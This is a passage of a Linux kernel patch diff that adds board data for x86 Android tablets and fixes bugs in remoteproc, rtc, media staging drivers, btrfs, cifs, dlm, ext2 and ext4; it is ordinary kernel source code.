++	/*
++	 * The gpio_desc returned by x86_android_tablet_get_gpiod() is a "raw"
++	 * gpio_desc, that is there is no way to pass lookup-flags like
++	 * GPIO_ACTIVE_LOW. Set the GPIO to 0 here to enable charging since
++	 * the /CE pin is active-low, but not marked as such in the gpio_desc.
++	 */
++	gpiod_set_value(gpiod, 0);
++
++	/* OTG pin */
++	ret = x86_android_tablet_get_gpiod("INT33FF:03", 19, &gpiod);
++	if (ret < 0)
++		return ret;
++
++	gpiod_set_value(gpiod, 0);
++
++	return 0;
++}
++
++static const struct x86_dev_info lenovo_yt3_info __initconst = {
++	.i2c_client_info = lenovo_yt3_i2c_clients,
++	.i2c_client_count = ARRAY_SIZE(lenovo_yt3_i2c_clients),
++	.init = lenovo_yt3_init,
++};
++
++/* Medion Lifetab S10346 tablets have an Android factory img with everything hardcoded */
++static const char * const medion_lifetab_s10346_accel_mount_matrix[] = {
++	"0", "1", "0",
++	"1", "0", "0",
++	"0", "0", "1"
++};
++
++static const struct property_entry medion_lifetab_s10346_accel_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("mount-matrix", medion_lifetab_s10346_accel_mount_matrix),
++	{ }
++};
++
++static const struct software_node medion_lifetab_s10346_accel_node = {
++	.properties = medion_lifetab_s10346_accel_props,
++};
++
++/* Note the LCD panel is mounted upside down, this is correctly indicated in the VBT */
++static const struct property_entry medion_lifetab_s10346_touchscreen_props[] = {
++	PROPERTY_ENTRY_BOOL("touchscreen-inverted-x"),
++	PROPERTY_ENTRY_BOOL("touchscreen-swapped-x-y"),
++	{ }
++};
++
++static const struct software_node medion_lifetab_s10346_touchscreen_node = {
++	.properties = medion_lifetab_s10346_touchscreen_props,
++};
++
++static const struct x86_i2c_client_info medion_lifetab_s10346_i2c_clients[] __initconst = {
++	{
++		/* kxtj21009 accel */
++		.board_info = {
++			.type = "kxtj21009",
++			.addr = 0x0f,
++			.dev_name = "kxtj21009",
++			.swnode = &medion_lifetab_s10346_accel_node,
++		},
++		.adapter_path = "\\_SB_.I2C3",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FC:02",
++			.index = 23,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_HIGH,
++		},
++	}, {
++		/* goodix touchscreen */
++		.board_info = {
++			.type = "GDIX1001:00",
++			.addr = 0x14,
++			.dev_name = "goodix_ts",
++			.swnode = &medion_lifetab_s10346_touchscreen_node,
++		},
++		.adapter_path = "\\_SB_.I2C4",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_APIC,
++			.index = 0x44,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_LOW,
++		},
++	},
++};
++
++static struct gpiod_lookup_table medion_lifetab_s10346_goodix_gpios = {
++	.dev_id = "i2c-goodix_ts",
++	.table = {
++		GPIO_LOOKUP("INT33FC:01", 26, "reset", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("INT33FC:02", 3, "irq", GPIO_ACTIVE_HIGH),
++		{ }
++	},
++};
++
++static struct gpiod_lookup_table * const medion_lifetab_s10346_gpios[] = {
++	&medion_lifetab_s10346_goodix_gpios,
++	NULL
++};
++
++static const struct x86_dev_info medion_lifetab_s10346_info __initconst = {
++	.i2c_client_info = medion_lifetab_s10346_i2c_clients,
++	.i2c_client_count = ARRAY_SIZE(medion_lifetab_s10346_i2c_clients),
++	.gpiod_lookup_tables = medion_lifetab_s10346_gpios,
++};
++
+ /* Nextbook Ares 8 tablets have an Android factory img with everything hardcoded */
+ static const char * const nextbook_ares8_accel_mount_matrix[] = {
+ 	"0", "-1", "0",
+@@ -1179,6 +1435,14 @@ static const struct x86_dev_info xiaomi_mipad2_info __initconst = {
+ };
+ 
+ static const struct dmi_system_id x86_android_tablet_ids[] __initconst = {
++	{
++		/* Advantech MICA-071 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Advantech"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "MICA-071"),
++		},
++		.driver_data = (void *)&advantech_mica_071_info,
++	},
+ 	{
+ 		/* Asus MeMO Pad 7 ME176C */
+ 		.matches = {
+@@ -1245,6 +1509,25 @@ static const struct dmi_system_id x86_android_tablet_ids[] __initconst = {
+ 		},
+ 		.driver_data = (void *)&lenovo_yoga_tab2_830_1050_info,
+ 	},
++	{
++		/* Lenovo Yoga Tab 3 Pro YT3-X90F */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)&lenovo_yt3_info,
++	},
++	{
++		/* Medion Lifetab S10346 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Aptio CRB"),
++			/* Above strings are much too generic, also match on BIOS date */
++			DMI_MATCH(DMI_BIOS_DATE, "10/22/2015"),
++		},
++		.driver_data = (void *)&medion_lifetab_s10346_info,
++	},
+ 	{
+ 		/* Nextbook Ares 8 */
+ 		.matches = {
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 899aa8dd12f07..95da1cbefacf0 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -347,9 +347,6 @@ static int imx_dsp_rproc_stop(struct rproc *rproc)
+ 	struct device *dev = rproc->dev.parent;
+ 	int ret = 0;
+ 
+-	/* Make sure work is finished */
+-	flush_work(&priv->rproc_work);
+-
+ 	if (rproc->state == RPROC_CRASHED) {
+ 		priv->flags &= ~REMOTE_IS_READY;
+ 		return 0;
+@@ -432,9 +429,18 @@ static void imx_dsp_rproc_vq_work(struct work_struct *work)
+ {
+ 	struct imx_dsp_rproc *priv = container_of(work, struct imx_dsp_rproc,
+ 						  rproc_work);
++	struct rproc *rproc = priv->rproc;
++
++	mutex_lock(&rproc->lock);
++
++	if (rproc->state != RPROC_RUNNING)
++		goto unlock_mutex;
+ 
+ 	rproc_vq_interrupt(priv->rproc, 0);
+ 	rproc_vq_interrupt(priv->rproc, 1);
++
++unlock_mutex:
++	mutex_unlock(&rproc->lock);
+ }
+ 
+ /**
+diff --git a/drivers/remoteproc/imx_rproc.c b/drivers/remoteproc/imx_rproc.c
+index 7cc4fd207e2d8..596e1440cca56 100644
+--- a/drivers/remoteproc/imx_rproc.c
++++ b/drivers/remoteproc/imx_rproc.c
+@@ -113,8 +113,8 @@ static const struct imx_rproc_att imx_rproc_att_imx93[] = {
+ 	{ 0x80000000, 0x80000000, 0x10000000, 0 },
+ 	{ 0x90000000, 0x80000000, 0x10000000, 0 },
+ 
+-	{ 0xC0000000, 0xa0000000, 0x10000000, 0 },
+-	{ 0xD0000000, 0xa0000000, 0x10000000, 0 },
++	{ 0xC0000000, 0xC0000000, 0x10000000, 0 },
++	{ 0xD0000000, 0xC0000000, 0x10000000, 0 },
+ };
+ 
+ static const struct imx_rproc_att imx_rproc_att_imx8mn[] = {
+diff --git a/drivers/remoteproc/remoteproc_core.c b/drivers/remoteproc/remoteproc_core.c
+index cb1d414a23896..c3f194d9384da 100644
+--- a/drivers/remoteproc/remoteproc_core.c
++++ b/drivers/remoteproc/remoteproc_core.c
+@@ -1868,12 +1868,18 @@ static void rproc_crash_handler_work(struct work_struct *work)
+ 
+ 	mutex_lock(&rproc->lock);
+ 
+-	if (rproc->state == RPROC_CRASHED || rproc->state == RPROC_OFFLINE) {
++	if (rproc->state == RPROC_CRASHED) {
+ 		/* handle only the first crash detected */
+ 		mutex_unlock(&rproc->lock);
+ 		return;
+ 	}
+ 
++	if (rproc->state == RPROC_OFFLINE) {
++		/* Don't recover if the remote processor was stopped */
++		mutex_unlock(&rproc->lock);
++		goto out;
++	}
++
+ 	rproc->state = RPROC_CRASHED;
+ 	dev_err(dev, "handling crash #%u in %s\n", ++rproc->crash_cnt,
+ 		rproc->name);
+@@ -1883,6 +1889,7 @@ static void rproc_crash_handler_work(struct work_struct *work)
+ 	if (!rproc->recovery_disabled)
+ 		rproc_trigger_recovery(rproc);
+ 
++out:
+ 	pm_relax(rproc->dev.parent);
+ }
+ 
+diff --git a/drivers/rtc/rtc-ds1347.c b/drivers/rtc/rtc-ds1347.c
+index 157bf5209ac40..a40c1a52df659 100644
+--- a/drivers/rtc/rtc-ds1347.c
++++ b/drivers/rtc/rtc-ds1347.c
+@@ -112,7 +112,7 @@ static int ds1347_set_time(struct device *dev, struct rtc_time *dt)
+ 		return err;
+ 
+ 	century = (dt->tm_year / 100) + 19;
+-	err = regmap_write(map, DS1347_CENTURY_REG, century);
++	err = regmap_write(map, DS1347_CENTURY_REG, bin2bcd(century));
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/soc/qcom/Kconfig b/drivers/soc/qcom/Kconfig
+index 024e420f1bb77..ae504c43d9e74 100644
+--- a/drivers/soc/qcom/Kconfig
++++ b/drivers/soc/qcom/Kconfig
+@@ -63,6 +63,7 @@ config QCOM_GSBI
+ config QCOM_LLCC
+ 	tristate "Qualcomm Technologies, Inc. LLCC driver"
+ 	depends on ARCH_QCOM || COMPILE_TEST
++	select REGMAP_MMIO
+ 	help
+ 	  Qualcomm Technologies, Inc. platform specific
+ 	  Last Level Cache Controller(LLCC) driver for platforms such as,
+@@ -236,6 +237,7 @@ config QCOM_ICC_BWMON
+ 	tristate "QCOM Interconnect Bandwidth Monitor driver"
+ 	depends on ARCH_QCOM || COMPILE_TEST
+ 	select PM_OPP
++	select REGMAP_MMIO
+ 	help
+ 	  Sets up driver monitoring bandwidth on various interconnects and
+ 	  based on that voting for interconnect bandwidth, adjusting their
+diff --git a/drivers/soc/ux500/ux500-soc-id.c b/drivers/soc/ux500/ux500-soc-id.c
+index a9472e0e5d61c..27d6e25a01153 100644
+--- a/drivers/soc/ux500/ux500-soc-id.c
++++ b/drivers/soc/ux500/ux500-soc-id.c
+@@ -167,20 +167,18 @@ ATTRIBUTE_GROUPS(ux500_soc);
+ static const char *db8500_read_soc_id(struct device_node *backupram)
+ {
+ 	void __iomem *base;
+-	void __iomem *uid;
+ 	const char *retstr;
++	u32 uid[5];
+ 
+ 	base = of_iomap(backupram, 0);
+ 	if (!base)
+ 		return NULL;
+-	uid = base + 0x1fc0;
++	memcpy_fromio(uid, base + 0x1fc0, sizeof(uid));
+ 
+ 	/* Throw these device-specific numbers into the entropy pool */
+-	add_device_randomness(uid, 0x14);
++	add_device_randomness(uid, sizeof(uid));
+ 	retstr = kasprintf(GFP_KERNEL, "%08x%08x%08x%08x%08x",
+-			 readl((u32 *)uid+0),
+-			 readl((u32 *)uid+1), readl((u32 *)uid+2),
+-			 readl((u32 *)uid+3), readl((u32 *)uid+4));
++			   uid[0], uid[1], uid[2], uid[3], uid[4]);
+ 	iounmap(base);
+ 	return retstr;
+ }
+diff --git a/drivers/staging/media/ipu3/ipu3-v4l2.c b/drivers/staging/media/ipu3/ipu3-v4l2.c
+index ce13e746c15f3..e530767e80a5d 100644
+--- a/drivers/staging/media/ipu3/ipu3-v4l2.c
++++ b/drivers/staging/media/ipu3/ipu3-v4l2.c
+@@ -188,6 +188,28 @@ static int imgu_subdev_set_fmt(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
++static struct v4l2_rect *
++imgu_subdev_get_crop(struct imgu_v4l2_subdev *sd,
++		     struct v4l2_subdev_state *sd_state, unsigned int pad,
++		     enum v4l2_subdev_format_whence which)
++{
++	if (which == V4L2_SUBDEV_FORMAT_TRY)
++		return v4l2_subdev_get_try_crop(&sd->subdev, sd_state, pad);
++	else
++		return &sd->rect.eff;
++}
++
++static struct v4l2_rect *
++imgu_subdev_get_compose(struct imgu_v4l2_subdev *sd,
++			struct v4l2_subdev_state *sd_state, unsigned int pad,
++			enum v4l2_subdev_format_whence which)
++{
++	if (which == V4L2_SUBDEV_FORMAT_TRY)
++		return v4l2_subdev_get_try_compose(&sd->subdev, sd_state, pad);
++	else
++		return &sd->rect.bds;
++}
++
+ static int imgu_subdev_get_selection(struct v4l2_subdev *sd,
+ 				     struct v4l2_subdev_state *sd_state,
+ 				     struct v4l2_subdev_selection *sel)
+@@ -200,18 +222,12 @@ static int imgu_subdev_get_selection(struct v4l2_subdev *sd,
+ 
+ 	switch (sel->target) {
+ 	case V4L2_SEL_TGT_CROP:
+-		if (sel->which == V4L2_SUBDEV_FORMAT_TRY)
+-			sel->r = *v4l2_subdev_get_try_crop(sd, sd_state,
+-							   sel->pad);
+-		else
+-			sel->r = imgu_sd->rect.eff;
++		sel->r = *imgu_subdev_get_crop(imgu_sd, sd_state, sel->pad,
++					       sel->which);
+ 		return 0;
+ 	case V4L2_SEL_TGT_COMPOSE:
+-		if (sel->which == V4L2_SUBDEV_FORMAT_TRY)
+-			sel->r = *v4l2_subdev_get_try_compose(sd, sd_state,
+-							      sel->pad);
+-		else
+-			sel->r = imgu_sd->rect.bds;
++		sel->r = *imgu_subdev_get_compose(imgu_sd, sd_state, sel->pad,
++						  sel->which);
+ 		return 0;
+ 	default:
+ 		return -EINVAL;
+@@ -223,10 +239,9 @@ static int imgu_subdev_set_selection(struct v4l2_subdev *sd,
+ 				     struct v4l2_subdev_selection *sel)
+ {
+ 	struct imgu_device *imgu = v4l2_get_subdevdata(sd);
+-	struct imgu_v4l2_subdev *imgu_sd = container_of(sd,
+-							struct imgu_v4l2_subdev,
+-							subdev);
+-	struct v4l2_rect *rect, *try_sel;
++	struct imgu_v4l2_subdev *imgu_sd =
++		container_of(sd, struct imgu_v4l2_subdev, subdev);
++	struct v4l2_rect *rect;
+ 
+ 	dev_dbg(&imgu->pci_dev->dev,
+ 		 "set subdev %u sel which %u target 0x%4x rect [%ux%u]",
+@@ -238,22 +253,18 @@ static int imgu_subdev_set_selection(struct v4l2_subdev *sd,
+ 
+ 	switch (sel->target) {
+ 	case V4L2_SEL_TGT_CROP:
+-		try_sel = v4l2_subdev_get_try_crop(sd, sd_state, sel->pad);
+-		rect = &imgu_sd->rect.eff;
++		rect = imgu_subdev_get_crop(imgu_sd, sd_state, sel->pad,
++					    sel->which);
+ 		break;
+ 	case V4L2_SEL_TGT_COMPOSE:
+-		try_sel = v4l2_subdev_get_try_compose(sd, sd_state, sel->pad);
+-		rect = &imgu_sd->rect.bds;
++		rect = imgu_subdev_get_compose(imgu_sd, sd_state, sel->pad,
++					       sel->which);
+ 		break;
+ 	default:
+ 		return -EINVAL;
+ 	}
+ 
+-	if (sel->which == V4L2_SUBDEV_FORMAT_TRY)
+-		*try_sel = sel->r;
+-	else
+-		*rect = sel->r;
+-
++	*rect = sel->r;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/staging/media/tegra-video/csi.c b/drivers/staging/media/tegra-video/csi.c
+index b26e44adb2be7..426e653bd55d5 100644
+--- a/drivers/staging/media/tegra-video/csi.c
++++ b/drivers/staging/media/tegra-video/csi.c
+@@ -433,7 +433,7 @@ static int tegra_csi_channel_alloc(struct tegra_csi *csi,
+ 	for (i = 0; i < chan->numgangports; i++)
+ 		chan->csi_port_nums[i] = port_num + i * CSI_PORTS_PER_BRICK;
+ 
+-	chan->of_node = node;
++	chan->of_node = of_node_get(node);
+ 	chan->numpads = num_pads;
+ 	if (num_pads & 0x2) {
+ 		chan->pads[0].flags = MEDIA_PAD_FL_SINK;
+@@ -448,6 +448,7 @@ static int tegra_csi_channel_alloc(struct tegra_csi *csi,
+ 	chan->mipi = tegra_mipi_request(csi->dev, node);
+ 	if (IS_ERR(chan->mipi)) {
+ 		ret = PTR_ERR(chan->mipi);
++		chan->mipi = NULL;
+ 		dev_err(csi->dev, "failed to get mipi device: %d\n", ret);
+ 	}
+ 
+@@ -640,6 +641,7 @@ static void tegra_csi_channels_cleanup(struct tegra_csi *csi)
+ 			media_entity_cleanup(&subdev->entity);
+ 		}
+ 
++		of_node_put(chan->of_node);
+ 		list_del(&chan->list);
+ 		kfree(chan);
+ 	}
+diff --git a/drivers/staging/media/tegra-video/csi.h b/drivers/staging/media/tegra-video/csi.h
+index 4ee05a1785cfa..6960ea2e3d360 100644
+--- a/drivers/staging/media/tegra-video/csi.h
++++ b/drivers/staging/media/tegra-video/csi.h
+@@ -56,7 +56,7 @@ struct tegra_csi;
+  * @framerate: active framerate for TPG
+  * @h_blank: horizontal blanking for TPG active format
+  * @v_blank: vertical blanking for TPG active format
+- * @mipi: mipi device for corresponding csi channel pads
++ * @mipi: mipi device for corresponding csi channel pads, or NULL if not applicable (TPG, error)
+  * @pixel_rate: active pixel rate from the sensor on this channel
+  */
+ struct tegra_csi_channel {
+diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c
+index 18374a6d05bdf..18cf801ab5908 100644
+--- a/fs/btrfs/backref.c
++++ b/fs/btrfs/backref.c
+@@ -433,6 +433,7 @@ static int add_all_parents(struct btrfs_root *root, struct btrfs_path *path,
+ 	u64 wanted_disk_byte = ref->wanted_disk_byte;
+ 	u64 count = 0;
+ 	u64 data_offset;
++	u8 type;
+ 
+ 	if (level != 0) {
+ 		eb = path->nodes[level];
+@@ -487,6 +488,9 @@ static int add_all_parents(struct btrfs_root *root, struct btrfs_path *path,
+ 			continue;
+ 		}
+ 		fi = btrfs_item_ptr(eb, slot, struct btrfs_file_extent_item);
++		type = btrfs_file_extent_type(eb, fi);
++		if (type == BTRFS_FILE_EXTENT_INLINE)
++			goto next;
+ 		disk_byte = btrfs_file_extent_disk_bytenr(eb, fi);
+ 		data_offset = btrfs_file_extent_offset(eb, fi);
+ 
+diff --git a/fs/btrfs/extent-io-tree.c b/fs/btrfs/extent-io-tree.c
+index 3676580c2d97e..7b93719a486c5 100644
+--- a/fs/btrfs/extent-io-tree.c
++++ b/fs/btrfs/extent-io-tree.c
+@@ -397,7 +397,7 @@ static int insert_state(struct extent_io_tree *tree,
+ 			u32 bits, struct extent_changeset *changeset)
+ {
+ 	struct rb_node **node;
+-	struct rb_node *parent;
++	struct rb_node *parent = NULL;
+ 	const u64 end = state->end;
+ 
+ 	set_state_bits(tree, state, bits, changeset);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 635f45f1a2ef8..dba087ad40ea2 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -7241,8 +7241,9 @@ static int read_one_chunk(struct btrfs_key *key, struct extent_buffer *leaf,
+ 			map->stripes[i].dev = handle_missing_device(fs_info,
+ 								    devid, uuid);
+ 			if (IS_ERR(map->stripes[i].dev)) {
++				ret = PTR_ERR(map->stripes[i].dev);
+ 				free_extent_map(em);
+-				return PTR_ERR(map->stripes[i].dev);
++				return ret;
+ 			}
+ 		}
+ 
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 712a431614480..6094cb2ff099b 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -678,9 +678,15 @@ cifs_show_options(struct seq_file *s, struct dentry *root)
+ 	seq_printf(s, ",echo_interval=%lu",
+ 			tcon->ses->server->echo_interval / HZ);
+ 
+-	/* Only display max_credits if it was overridden on mount */
++	/* Only display the following if overridden on mount */
+ 	if (tcon->ses->server->max_credits != SMB2_MAX_CREDITS_AVAILABLE)
+ 		seq_printf(s, ",max_credits=%u", tcon->ses->server->max_credits);
++	if (tcon->ses->server->tcp_nodelay)
++		seq_puts(s, ",tcpnodelay");
++	if (tcon->ses->server->noautotune)
++		seq_puts(s, ",noautotune");
++	if (tcon->ses->server->noblocksnd)
++		seq_puts(s, ",noblocksend");
+ 
+ 	if (tcon->snapshot_time)
+ 		seq_printf(s, ",snapshot=%llu", tcon->snapshot_time);
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 9db9527c61cfc..7e7f712f97fd8 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -279,8 +279,10 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 			tcon->need_reconnect = true;
+ 			tcon->status = TID_NEED_RECON;
+ 		}
+-		if (ses->tcon_ipc)
++		if (ses->tcon_ipc) {
+ 			ses->tcon_ipc->need_reconnect = true;
++			ses->tcon_ipc->status = TID_NEED_RECON;
++		}
+ 
+ next_session:
+ 		spin_unlock(&ses->chan_lock);
+@@ -1871,6 +1873,9 @@ cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 
+ 	cifs_dbg(FYI, "IPC tcon rc=%d ipc tid=0x%x\n", rc, tcon->tid);
+ 
++	spin_lock(&tcon->tc_lock);
++	tcon->status = TID_GOOD;
++	spin_unlock(&tcon->tc_lock);
+ 	ses->tcon_ipc = tcon;
+ out:
+ 	return rc;
+@@ -2157,7 +2162,7 @@ cifs_set_cifscreds(struct smb3_fs_context *ctx __attribute__((unused)),
+ struct cifs_ses *
+ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ {
+-	int rc = -ENOMEM;
++	int rc = 0;
+ 	unsigned int xid;
+ 	struct cifs_ses *ses;
+ 	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
+@@ -2206,6 +2211,8 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 		return ses;
+ 	}
+ 
++	rc = -ENOMEM;
++
+ 	cifs_dbg(FYI, "Existing smb sess not found\n");
+ 	ses = sesInfoAlloc();
+ 	if (ses == NULL)
+@@ -2278,10 +2285,10 @@ cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 	list_add(&ses->smb_ses_list, &server->smb_ses_list);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+-	free_xid(xid);
+-
+ 	cifs_setup_ipc(ses, ctx);
+ 
++	free_xid(xid);
++
+ 	return ses;
+ 
+ get_ses_fail:
+@@ -2600,6 +2607,7 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	tcon->nodelete = ctx->nodelete;
+ 	tcon->local_lease = ctx->local_lease;
+ 	INIT_LIST_HEAD(&tcon->pending_opens);
++	tcon->status = TID_GOOD;
+ 
+ 	/* schedule query interfaces poll */
+ 	INIT_DELAYED_WORK(&tcon->query_interfaces,
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 59f64c596233b..871d4e9f49fb6 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -1543,7 +1543,11 @@ static void process_recv_sockets(struct work_struct *work)
+ 
+ static void process_listen_recv_socket(struct work_struct *work)
+ {
+-	accept_from_sock(&listen_con);
++	int ret;
++
++	do {
++		ret = accept_from_sock(&listen_con);
++	} while (!ret);
+ }
+ 
+ static void dlm_connect(struct connection *con)
+@@ -1820,7 +1824,7 @@ static int dlm_listen_for_all(void)
+ 	result = sock->ops->listen(sock, 5);
+ 	if (result < 0) {
+ 		dlm_close_sock(&listen_con.sock);
+-		goto out;
++		return result;
+ 	}
+ 
+ 	return 0;
+@@ -2023,7 +2027,6 @@ fail_listen:
+ 	dlm_proto_ops = NULL;
+ fail_proto_ops:
+ 	dlm_allow_conn = 0;
+-	dlm_close_sock(&listen_con.sock);
+ 	work_stop();
+ fail_local:
+ 	deinit_local();
+diff --git a/fs/ext2/dir.c b/fs/ext2/dir.c
+index 8f597753ac129..5202eddfc3c0a 100644
+--- a/fs/ext2/dir.c
++++ b/fs/ext2/dir.c
+@@ -679,7 +679,7 @@ int ext2_empty_dir (struct inode * inode)
+ 		page = ext2_get_page(inode, i, 0, &page_addr);
+ 
+ 		if (IS_ERR(page))
+-			goto not_empty;
++			return 0;
+ 
+ 		kaddr = page_addr;
+ 		de = (ext2_dirent *)kaddr;
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 8d5453852f98e..4e739902dc03a 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -558,7 +558,7 @@ enum {
+  *
+  * It's not paranoia if the Murphy's Law really *is* out to get you.  :-)
+  */
+-#define TEST_FLAG_VALUE(FLAG) (EXT4_##FLAG##_FL == (1 << EXT4_INODE_##FLAG))
++#define TEST_FLAG_VALUE(FLAG) (EXT4_##FLAG##_FL == (1U << EXT4_INODE_##FLAG))
+ #define CHECK_FLAG_VALUE(FLAG) BUILD_BUG_ON(!TEST_FLAG_VALUE(FLAG))
+ 
+ static inline void ext4_check_flag_values(void)
+@@ -2964,7 +2964,8 @@ int do_journal_get_write_access(handle_t *handle, struct inode *inode,
+ typedef enum {
+ 	EXT4_IGET_NORMAL =	0,
+ 	EXT4_IGET_SPECIAL =	0x0001, /* OK to iget a system inode */
+-	EXT4_IGET_HANDLE = 	0x0002	/* Inode # is from a handle */
++	EXT4_IGET_HANDLE = 	0x0002,	/* Inode # is from a handle */
++	EXT4_IGET_BAD =		0x0004  /* Allow to iget a bad inode */
+ } ext4_iget_flags;
+ 
+ extern struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+@@ -3619,8 +3620,8 @@ extern void ext4_initialize_dirent_tail(struct buffer_head *bh,
+ 					unsigned int blocksize);
+ extern int ext4_handle_dirty_dirblock(handle_t *handle, struct inode *inode,
+ 				      struct buffer_head *bh);
+-extern int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name,
+-			 struct inode *inode);
++extern int __ext4_unlink(struct inode *dir, const struct qstr *d_name,
++			 struct inode *inode, struct dentry *dentry);
+ extern int __ext4_link(struct inode *dir, struct inode *inode,
+ 		       struct dentry *dentry);
+ 
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 6c399a8b22b35..36225ef56b0cd 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -5799,6 +5799,14 @@ int ext4_clu_mapped(struct inode *inode, ext4_lblk_t lclu)
+ 	struct ext4_extent *extent;
+ 	ext4_lblk_t first_lblk, first_lclu, last_lclu;
+ 
++	/*
++	 * if data can be stored inline, the logical cluster isn't
++	 * mapped - no physical clusters have been allocated, and the
++	 * file has no extents
++	 */
++	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
++		return 0;
++
+ 	/* search for the extent closest to the first block in the cluster */
+ 	path = ext4_find_extent(inode, EXT4_C2B(sbi, lclu), NULL, 0);
+ 	if (IS_ERR(path)) {
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index cd0a861853e3f..7ada374ff27d7 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -1371,7 +1371,7 @@ retry:
+ 		if (count_reserved)
+ 			count_rsvd(inode, lblk, orig_es.es_len - len1 - len2,
+ 				   &orig_es, &rc);
+-		goto out;
++		goto out_get_reserved;
+ 	}
+ 
+ 	if (len1 > 0) {
+@@ -1413,6 +1413,7 @@ retry:
+ 		}
+ 	}
+ 
++out_get_reserved:
+ 	if (count_reserved)
+ 		*reserved = get_rsvd(inode, end, es, &rc);
+ out:
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 0f6d0a80467d7..7ed71c652f67f 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -420,25 +420,34 @@ static int __track_dentry_update(struct inode *inode, void *arg, bool update)
+ 	struct __track_dentry_update_args *dentry_update =
+ 		(struct __track_dentry_update_args *)arg;
+ 	struct dentry *dentry = dentry_update->dentry;
+-	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
++	struct inode *dir = dentry->d_parent->d_inode;
++	struct super_block *sb = inode->i_sb;
++	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 
+ 	mutex_unlock(&ei->i_fc_lock);
++
++	if (IS_ENCRYPTED(dir)) {
++		ext4_fc_mark_ineligible(sb, EXT4_FC_REASON_ENCRYPTED_FILENAME,
++					NULL);
++		mutex_lock(&ei->i_fc_lock);
++		return -EOPNOTSUPP;
++	}
++
+ 	node = kmem_cache_alloc(ext4_fc_dentry_cachep, GFP_NOFS);
+ 	if (!node) {
+-		ext4_fc_mark_ineligible(inode->i_sb, EXT4_FC_REASON_NOMEM, NULL);
++		ext4_fc_mark_ineligible(sb, EXT4_FC_REASON_NOMEM, NULL);
+ 		mutex_lock(&ei->i_fc_lock);
+ 		return -ENOMEM;
+ 	}
+ 
+ 	node->fcd_op = dentry_update->op;
+-	node->fcd_parent = dentry->d_parent->d_inode->i_ino;
++	node->fcd_parent = dir->i_ino;
+ 	node->fcd_ino = inode->i_ino;
+ 	if (dentry->d_name.len > DNAME_INLINE_LEN) {
+ 		node->fcd_name.name = kmalloc(dentry->d_name.len, GFP_NOFS);
+ 		if (!node->fcd_name.name) {
+ 			kmem_cache_free(ext4_fc_dentry_cachep, node);
+-			ext4_fc_mark_ineligible(inode->i_sb,
+-				EXT4_FC_REASON_NOMEM, NULL);
++			ext4_fc_mark_ineligible(sb, EXT4_FC_REASON_NOMEM, NULL);
+ 			mutex_lock(&ei->i_fc_lock);
+ 			return -ENOMEM;
+ 		}
+@@ -666,6 +675,15 @@ static void ext4_fc_submit_bh(struct super_block *sb, bool is_tail)
+ 
+ /* Ext4 commit path routines */
+ 
++/* memcpy to fc reserved space and update CRC */
++static void *ext4_fc_memcpy(struct super_block *sb, void *dst, const void *src,
++				int len, u32 *crc)
++{
++	if (crc)
++		*crc = ext4_chksum(EXT4_SB(sb), *crc, src, len);
++	return memcpy(dst, src, len);
++}
++
+ /* memzero and update CRC */
